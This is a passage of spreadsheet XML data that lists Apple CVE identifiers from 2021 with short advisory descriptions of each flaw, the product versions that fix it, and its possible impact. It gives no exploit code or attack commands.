    <t>A malicious application may be able to overwrite arbitrary files. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-004 Mojave. An issue with path validation logic for hardlinks was addressed with improved path sanitization.</t>
  </si>
  <si>
    <t>CVE-2021-30739</t>
  </si>
  <si>
    <t>A local attacker may be able to elevate their privileges. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave. A memory corruption issue was addressed with improved validation.</t>
  </si>
  <si>
    <t>CVE-2021-30740</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved validation. This issue is fixed in macOS Big Sur 11.4, tvOS 14.6, watchOS 7.5, iOS 14.6 and iPadOS 14.6. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30741</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in iOS 14.6 and iPadOS 14.6. Processing a maliciously crafted mail message may lead to unexpected memory modification or application termination.</t>
  </si>
  <si>
    <t>CVE-2021-30742</t>
  </si>
  <si>
    <t>A memory consumption issue was addressed with improved memory handling. This issue is fixed in iOS 14.5 and iPadOS 14.5. Processing a maliciously crafted audio file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30743</t>
  </si>
  <si>
    <t>An out-of-bounds write was addressed with improved input validation. This issue is fixed in iOS 14.5 and iPadOS 14.5, watchOS 7.4, Security Update 2021-003 Catalina, tvOS 14.5, macOS Big Sur 11.3. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30744</t>
  </si>
  <si>
    <t>Description: A cross-origin issue with iframe elements was addressed with improved tracking of security origins. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. Processing maliciously crafted web content may lead to universal cross site scripting.</t>
  </si>
  <si>
    <t>CVE-2021-30746</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6. Processing a maliciously crafted USD file may disclose memory contents.</t>
  </si>
  <si>
    <t>CVE-2021-30748</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 14.7, macOS Big Sur 11.5. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30749</t>
  </si>
  <si>
    <t>CVE-2021-30750</t>
  </si>
  <si>
    <t>The issue was addressed with improved permissions logic. This issue is fixed in macOS Big Sur 11.3. A malicious application may be able to access the user's recent contacts.</t>
  </si>
  <si>
    <t>CVE-2021-30751</t>
  </si>
  <si>
    <t>This issue was addressed with improved data protection. This issue is fixed in macOS Big Sur 11.4. A malicious application may be able to bypass certain Privacy preferences.</t>
  </si>
  <si>
    <t>CVE-2021-30752</t>
  </si>
  <si>
    <t>Processing a maliciously crafted image may lead to arbitrary code execution. This issue is fixed in macOS Big Sur 11.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. An out-of-bounds read was addressed with improved input validation.</t>
  </si>
  <si>
    <t>CVE-2021-30753</t>
  </si>
  <si>
    <t>Processing a maliciously crafted font may result in the disclosure of process memory. This issue is fixed in macOS Big Sur 11.4, tvOS 14.6, watchOS 7.5, iOS 14.6 and iPadOS 14.6. An out-of-bounds read was addressed with improved input validation.</t>
  </si>
  <si>
    <t>CVE-2021-30755</t>
  </si>
  <si>
    <t>Processing a maliciously crafted font may result in the disclosure of process memory. This issue is fixed in macOS Big Sur 11.4, tvOS 14.6, watchOS 7.5. An out-of-bounds read was addressed with improved input validation.</t>
  </si>
  <si>
    <t>CVE-2021-30756</t>
  </si>
  <si>
    <t>A local attacker may be able to view Now Playing information from the lock screen. This issue is fixed in macOS Big Sur 11.4, iOS 14.6 and iPadOS 14.6. A privacy issue in Now Playing was addressed with improved permissions.</t>
  </si>
  <si>
    <t>CVE-2021-30757</t>
  </si>
  <si>
    <t>This issue was addressed by enabling hardened runtime. This issue is fixed in iMovie 10.2.4. Entitlements and privacy permissions granted to this app may be used by a malicious app.</t>
  </si>
  <si>
    <t>CVE-2021-30758</t>
  </si>
  <si>
    <t>A type confusion issue was addressed with improved state handling. This issue is fixed in iOS 14.7, Safari 14.1.2, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30759</t>
  </si>
  <si>
    <t>A stack overflow was addressed with improved input validation. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7, Security Update 2021-005 Mojave, Security Update 2021-004 Catalina. Processing a maliciously crafted font file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30760</t>
  </si>
  <si>
    <t>An integer overflow was addressed through improved input validation. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7, Security Update 2021-005 Mojave, Security Update 2021-004 Catalina. Processing a maliciously crafted font file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30761</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 12.5.4. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..</t>
  </si>
  <si>
    <t>CVE-2021-30762</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in iOS 12.5.4. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..</t>
  </si>
  <si>
    <t>CVE-2021-30763</t>
  </si>
  <si>
    <t>An input validation issue was addressed with improved input validation. This issue is fixed in iOS 14.7, watchOS 7.6. A shortcut may be able to bypass Internet permission requirements.</t>
  </si>
  <si>
    <t>CVE-2021-30764</t>
  </si>
  <si>
    <t>Processing a maliciously crafted file may lead to arbitrary code execution. This issue is fixed in iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. This issue was addressed with improved checks.</t>
  </si>
  <si>
    <t>CVE-2021-30765</t>
  </si>
  <si>
    <t>An out-of-bounds write was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.5, Security Update 2021-004 Catalina, Security Update 2021-005 Mojave. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30766</t>
  </si>
  <si>
    <t>CVE-2021-30767</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.2, macOS Monterey 12.1, Security Update 2021-008 Catalina, iOS 15.2 and iPadOS 15.2, watchOS 8.3. A local user may be able to modify protected parts of the file system.</t>
  </si>
  <si>
    <t>CVE-2021-30768</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved validation. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7, Security Update 2021-004 Catalina. A sandboxed process may be able to circumvent sandbox restrictions.</t>
  </si>
  <si>
    <t>CVE-2021-30769</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in iOS 14.7, tvOS 14.7, watchOS 7.6. A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication.</t>
  </si>
  <si>
    <t>CVE-2021-30770</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved validation. This issue is fixed in iOS 14.7, tvOS 14.7, watchOS 7.6. An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations.</t>
  </si>
  <si>
    <t>CVE-2021-30771</t>
  </si>
  <si>
    <t>An out-of-bounds write was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.4, iOS 14.6 and iPadOS 14.6, watchOS 7.5, tvOS 14.6. Processing a maliciously crafted font file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30772</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.5. A malicious application may be able to gain root privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30773</t>
  </si>
  <si>
    <t>An issue in code signature validation was addressed with improved checks. This issue is fixed in iOS 14.7, tvOS 14.7, watchOS 7.6. A malicious application may be able to bypass code signing checks.</t>
  </si>
  <si>
    <t>CVE-2021-30774</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved validation. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7. A malicious application may be able to gain root privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30775</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7, Security Update 2021-004 Catalina. Processing a maliciously crafted audio file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30776</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved validation. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7, Security Update 2021-004 Catalina. Playing a malicious audio file may lead to an unexpected application termination.</t>
  </si>
  <si>
    <t>CVE-2021-30777</t>
  </si>
  <si>
    <t>An injection issue was addressed with improved validation. This issue is fixed in macOS Big Sur 11.5, Security Update 2021-004 Catalina, Security Update 2021-005 Mojave. A malicious application may be able to gain root privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30778</t>
  </si>
  <si>
    <t>This issue was addressed with improved entitlements. This issue is fixed in macOS Big Sur 11.5. A malicious application may be able to bypass Privacy preferences.</t>
  </si>
  <si>
    <t>CVE-2021-30779</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30780</t>
  </si>
  <si>
    <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7, Security Update 2021-005 Mojave, Security Update 2021-004 Catalina. A malicious application may be able to gain root privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30781</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7, Security Update 2021-005 Mojave, Security Update 2021-004 Catalina. A local attacker may be able to cause unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30782</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.5, Security Update 2021-004 Catalina, Security Update 2021-005 Mojave. A malicious application may be able to access restricted files.</t>
  </si>
  <si>
    <t>CVE-2021-30783</t>
  </si>
  <si>
    <t>An access issue was addressed with improved access restrictions. This issue is fixed in macOS Big Sur 11.5, Security Update 2021-004 Catalina, Security Update 2021-005 Mojave. A sandboxed process may be able to circumvent sandbox restrictions.</t>
  </si>
  <si>
    <t>CVE-2021-30784</t>
  </si>
  <si>
    <t>Multiple issues were addressed with improved logic. This issue is fixed in macOS Big Sur 11.5. A local attacker may be able to execute code on the Apple T2 Security Chip.</t>
  </si>
  <si>
    <t>CVE-2021-30785</t>
  </si>
  <si>
    <t>A buffer overflow was addressed with improved bounds checking. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7, Security Update 2021-004 Catalina. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30786</t>
  </si>
  <si>
    <t>A race condition was addressed with improved state handling. This issue is fixed in iOS 14.7, macOS Big Sur 11.5. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30787</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.5, Security Update 2021-004 Catalina, Security Update 2021-005 Mojave. An application may be able to cause unexpected system termination or write kernel memory.</t>
  </si>
  <si>
    <t>CVE-2021-30788</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7, Security Update 2021-005 Mojave, Security Update 2021-004 Catalina. Processing a maliciously crafted tiff file may lead to a denial-of-service or potentially disclose memory contents.</t>
  </si>
  <si>
    <t>CVE-2021-30789</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7, Security Update 2021-004 Catalina. Processing a maliciously crafted font file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30790</t>
  </si>
  <si>
    <t>An information disclosure issue was addressed by removing the vulnerable code. This issue is fixed in macOS Big Sur 11.5, Security Update 2021-004 Catalina, Security Update 2021-005 Mojave. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30791</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 14.7, macOS Big Sur 11.5. Processing a maliciously crafted file may disclose user information.</t>
  </si>
  <si>
    <t>CVE-2021-30792</t>
  </si>
  <si>
    <t>An out-of-bounds write was addressed with improved input validation. This issue is fixed in iOS 14.7, macOS Big Sur 11.5. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30793</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.5, Security Update 2021-004 Catalina, Security Update 2021-005 Mojave. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30795</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in iOS 14.7, Safari 14.1.2, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30796</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved validation. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, Security Update 2021-004 Catalina, Security Update 2021-005 Mojave. Processing a maliciously crafted image may lead to a denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-30797</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in iOS 14.7, Safari 14.1.2, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7. Processing maliciously crafted web content may lead to code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30798</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, watchOS 7.6. A malicious application may be able to bypass certain Privacy preferences.</t>
  </si>
  <si>
    <t>CVE-2021-30799</t>
  </si>
  <si>
    <t>Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, Security Update 2021-004 Catalina, Security Update 2021-005 Mojave. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30800</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in iOS 14.7. Joining a malicious Wi-Fi network may result in a denial of service or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30802</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in iOS 14.7, tvOS 14.7. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30803</t>
  </si>
  <si>
    <t>A permissions issue was addressed with improved validation. This issue is fixed in macOS Big Sur 11.5. A malicious application may be able to access a user’s recent Contacts.</t>
  </si>
  <si>
    <t>CVE-2021-30804</t>
  </si>
  <si>
    <t>A permissions issue was addressed with improved validation. This issue is fixed in iOS 14.7. A malicious application may be able to access Find My data.</t>
  </si>
  <si>
    <t>CVE-2021-30805</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.5, Security Update 2021-004 Catalina, Security Update 2021-005 Mojave. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30807</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Big Sur 11.5.1, iOS 14.7.1 and iPadOS 14.7.1, watchOS 7.6.1. An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.</t>
  </si>
  <si>
    <t>CVE-2021-30808</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in tvOS 15, watchOS 8, iOS 15 and iPadOS 15. A malicious application may be able to modify protected parts of the file system.</t>
  </si>
  <si>
    <t>CVE-2021-30809</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in Safari 15, tvOS 15, watchOS 8, iOS 15 and iPadOS 15. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30810</t>
  </si>
  <si>
    <t>An authorization issue was addressed with improved state management. This issue is fixed in iOS 15 and iPadOS 15, watchOS 8, tvOS 15. An attacker in physical proximity may be able to force a user onto a malicious Wi-Fi network during device setup.</t>
  </si>
  <si>
    <t>CVE-2021-30811</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in iOS 15 and iPadOS 15, watchOS 8. A local attacker may be able to read sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-30813</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Monterey 12.0.1. A person with access to a host Mac may be able to bypass the Login Window in Remote Desktop for a locked instance of macOS.</t>
  </si>
  <si>
    <t>CVE-2021-30814</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved input validation. This issue is fixed in tvOS 15, watchOS 8, iOS 15 and iPadOS 15. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30815</t>
  </si>
  <si>
    <t>A lock screen issue allowed access to contacts on a locked device. This issue was addressed with improved state management. This issue is fixed in iOS 15 and iPadOS 15. A local attacker may be able to view contacts from the lock screen.</t>
  </si>
  <si>
    <t>CVE-2021-30816</t>
  </si>
  <si>
    <t>The issue was addressed with improved permissions logic. This issue is fixed in iOS 15 and iPadOS 15. An attacker with physical access to a device may be able to see private contact information.</t>
  </si>
  <si>
    <t>CVE-2021-30817</t>
  </si>
  <si>
    <t>A permissions issue was addressed with improved validation. This issue is fixed in macOS Big Sur 11.5. A malicious application may be able to access data about the accounts the user is using Family Sharing with.</t>
  </si>
  <si>
    <t>CVE-2021-30818</t>
  </si>
  <si>
    <t>A type confusion issue was addressed with improved state handling. This issue is fixed in iOS 14.8 and iPadOS 14.8, tvOS 15, iOS 15 and iPadOS 15, Safari 15, watchOS 8. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30819</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 15 and iPadOS 15. Processing a maliciously crafted USD file may disclose memory contents.</t>
  </si>
  <si>
    <t>CVE-2021-30820</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in iOS 14.8 and iPadOS 14.8. A remote attacker may be able to cause arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30821</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.0.1, Security Update 2021-007 Catalina, macOS Big Sur 11.6.1. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30823</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in macOS Monterey 12.0.1, iOS 14.8 and iPadOS 14.8, tvOS 15, Safari 15, watchOS 8. An attacker in a privileged network position may be able to bypass HSTS.</t>
  </si>
  <si>
    <t>CVE-2021-30824</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.0.1, Security Update 2021-007 Catalina, macOS Big Sur 11.6.1. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30825</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in iOS 15 and iPadOS 15. A local attacker may be able to cause unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30826</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in iOS 15 and iPadOS 15. In certain situations, the baseband would fail to enable integrity and ciphering protection.</t>
  </si>
  <si>
    <t>CVE-2021-30827</t>
  </si>
  <si>
    <t>A permissions issue existed. This issue was addressed with improved permission validation. This issue is fixed in Security Update 2021-005 Catalina, macOS Big Sur 11.6. A local attacker may be able to elevate their privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30828</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in Security Update 2021-005 Catalina, macOS Big Sur 11.6. A local user may be able to read arbitrary files as root.</t>
  </si>
  <si>
    <t>CVE-2021-30829</t>
  </si>
  <si>
    <t>A URI parsing issue was addressed with improved parsing. This issue is fixed in Security Update 2021-005 Catalina, macOS Big Sur 11.6. A local user may be able to execute arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2021-30830</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in Security Update 2021-005 Catalina, macOS Big Sur 11.6. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30831</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in tvOS 15, watchOS 8, iOS 15 and iPadOS 15. Processing a maliciously crafted font may result in the disclosure of process memory.</t>
  </si>
  <si>
    <t>CVE-2021-30832</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in Security Update 2021-005 Catalina, macOS Big Sur 11.6. A local attacker may be able to elevate their privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30833</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Monterey 12.0.1. Unpacking a maliciously crafted archive may allow an attacker to write arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2021-30834</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in iOS 14.8 and iPadOS 14.8, tvOS 15, iOS 15 and iPadOS 15, watchOS 8, Security Update 2021-007 Catalina. Processing a malicious audio file may result in unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30835</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in Security Update 2021-005 Catalina, iTunes 12.12 for Windows, tvOS 15, iOS 15 and iPadOS 15, watchOS 8. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30836</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 14.8 and iPadOS 14.8, tvOS 15, watchOS 8, iOS 15 and iPadOS 15. Processing a maliciously crafted audio file may disclose restricted memory.</t>
  </si>
  <si>
    <t>CVE-2021-30837</t>
  </si>
  <si>
    <t>A memory consumption issue was addressed with improved memory handling. This issue is fixed in iOS 15 and iPadOS 15, watchOS 8, tvOS 15. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30838</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 15 and iPadOS 15. A malicious application may be able to execute arbitrary code with system privileges on devices with an Apple Neural Engine.</t>
  </si>
  <si>
    <t>CVE-2021-30840</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in tvOS 15, watchOS 8, iOS 15 and iPadOS 15. Processing a maliciously crafted dfont file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30841</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6, Security Update 2021-005 Catalina, tvOS 15, iOS 15 and iPadOS 15, watchOS 8. Processing a maliciously crafted dfont file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30842</t>
  </si>
  <si>
    <t>CVE-2021-30843</t>
  </si>
  <si>
    <t>CVE-2021-30844</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in Security Update 2021-005 Catalina, macOS Big Sur 11.6. A remote attacker may be able to leak memory.</t>
  </si>
  <si>
    <t>CVE-2021-30845</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6. A local user may be able to read kernel memory.</t>
  </si>
  <si>
    <t>CVE-2021-30846</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 14.8 and iPadOS 14.8, Safari 15, tvOS 15, iOS 15 and iPadOS 15, watchOS 8. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30847</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in watchOS 8, macOS Big Sur 11.6, Security Update 2021-005 Catalina, tvOS 15, iOS 15 and iPadOS 15, iTunes 12.12 for Windows. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30848</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 14.8 and iPadOS 14.8, Safari 15, iOS 15 and iPadOS 15. Processing maliciously crafted web content may lead to code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30849</t>
  </si>
  <si>
    <t>Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 14.8 and iPadOS 14.8, watchOS 8, Safari 15, tvOS 15, iOS 15 and iPadOS 15, iTunes 12.12 for Windows. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30850</t>
  </si>
  <si>
    <t>An access issue was addressed with improved access restrictions. This issue is fixed in Security Update 2021-005 Catalina, macOS Big Sur 11.6, tvOS 15. A user may gain access to protected parts of the file system.</t>
  </si>
  <si>
    <t>CVE-2021-30851</t>
  </si>
  <si>
    <t>A memory corruption vulnerability was addressed with improved locking. This issue is fixed in Safari 15, tvOS 15, watchOS 8, iOS 15 and iPadOS 15. Processing maliciously crafted web content may lead to code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30852</t>
  </si>
  <si>
    <t>A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 14.8 and iPadOS 14.8, tvOS 15, watchOS 8, iOS 15 and iPadOS 15. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30853</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6. A malicious application may bypass Gatekeeper checks.</t>
  </si>
  <si>
    <t>CVE-2021-30854</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in tvOS 15, watchOS 8, iOS 15 and iPadOS 15. A sandboxed process may be able to circumvent sandbox restrictions.</t>
  </si>
  <si>
    <t>CVE-2021-30855</t>
  </si>
  <si>
    <t>A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks. This issue is fixed in Security Update 2021-005 Catalina, iOS 14.8 and iPadOS 14.8, iOS 15 and iPadOS 15, watchOS 8, macOS Big Sur 11.6. An application may be able to access restricted files.</t>
  </si>
  <si>
    <t>CVE-2021-30856</t>
  </si>
  <si>
    <t>This issue was addressed by adding a new Remote Login option for opting into Full Disk Access for Secure Shell sessions. This issue is fixed in macOS Big Sur 11.3. A malicious unsandboxed app on a system with Remote Login enabled may bypass Privacy preferences.</t>
  </si>
  <si>
    <t>CVE-2021-30857</t>
  </si>
  <si>
    <t>A race condition was addressed with improved locking. This issue is fixed in Security Update 2021-005 Catalina, iOS 14.8 and iPadOS 14.8, tvOS 15, iOS 15 and iPadOS 15, watchOS 8, macOS Big Sur 11.6. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30858</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.</t>
  </si>
  <si>
    <t>CVE-2021-30859</t>
  </si>
  <si>
    <t>A type confusion issue was addressed with improved state handling. This issue is fixed in iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6, Security Update 2021-005 Catalina. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30860</t>
  </si>
  <si>
    <t>An integer overflow was addressed with improved input validation. This issue is fixed in Security Update 2021-005 Catalina, iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6, watchOS 7.6.2. Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.</t>
  </si>
  <si>
    <t>CVE-2021-30861</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.0.1. A malicious application may bypass Gatekeeper checks.</t>
  </si>
  <si>
    <t>CVE-2021-30862</t>
  </si>
  <si>
    <t>A validation issue was addressed with improved input sanitization. This issue is fixed in iTunes U 3.8.3. Processing a maliciously crafted URL may lead to arbitrary javascript code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30863</t>
  </si>
  <si>
    <t>This issue was addressed by improving Face ID anti-spoofing models. This issue is fixed in iOS 15 and iPadOS 15. A 3D model constructed to look like the enrolled user may be able to authenticate via Face ID.</t>
  </si>
  <si>
